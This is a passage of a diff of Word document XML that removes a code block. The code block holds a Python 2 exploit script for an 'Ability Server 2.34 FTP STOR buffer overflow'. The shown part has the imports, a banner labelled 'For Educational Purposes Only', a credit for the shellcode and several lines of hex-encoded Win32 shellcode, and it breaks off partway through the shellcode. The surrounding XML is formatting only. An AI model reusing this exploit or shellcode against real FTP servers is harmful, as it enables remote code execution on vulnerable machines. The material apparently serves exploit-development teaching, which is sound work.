-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">import </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftplib</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ftplib</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> import FTP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">import </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>struct</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\n\n################################"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nAbility</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Server 2.34 FTP STOR buffer Overflow"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>nFor</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Educational Purposes </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>Only!\</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">n" </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>print "###################################"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
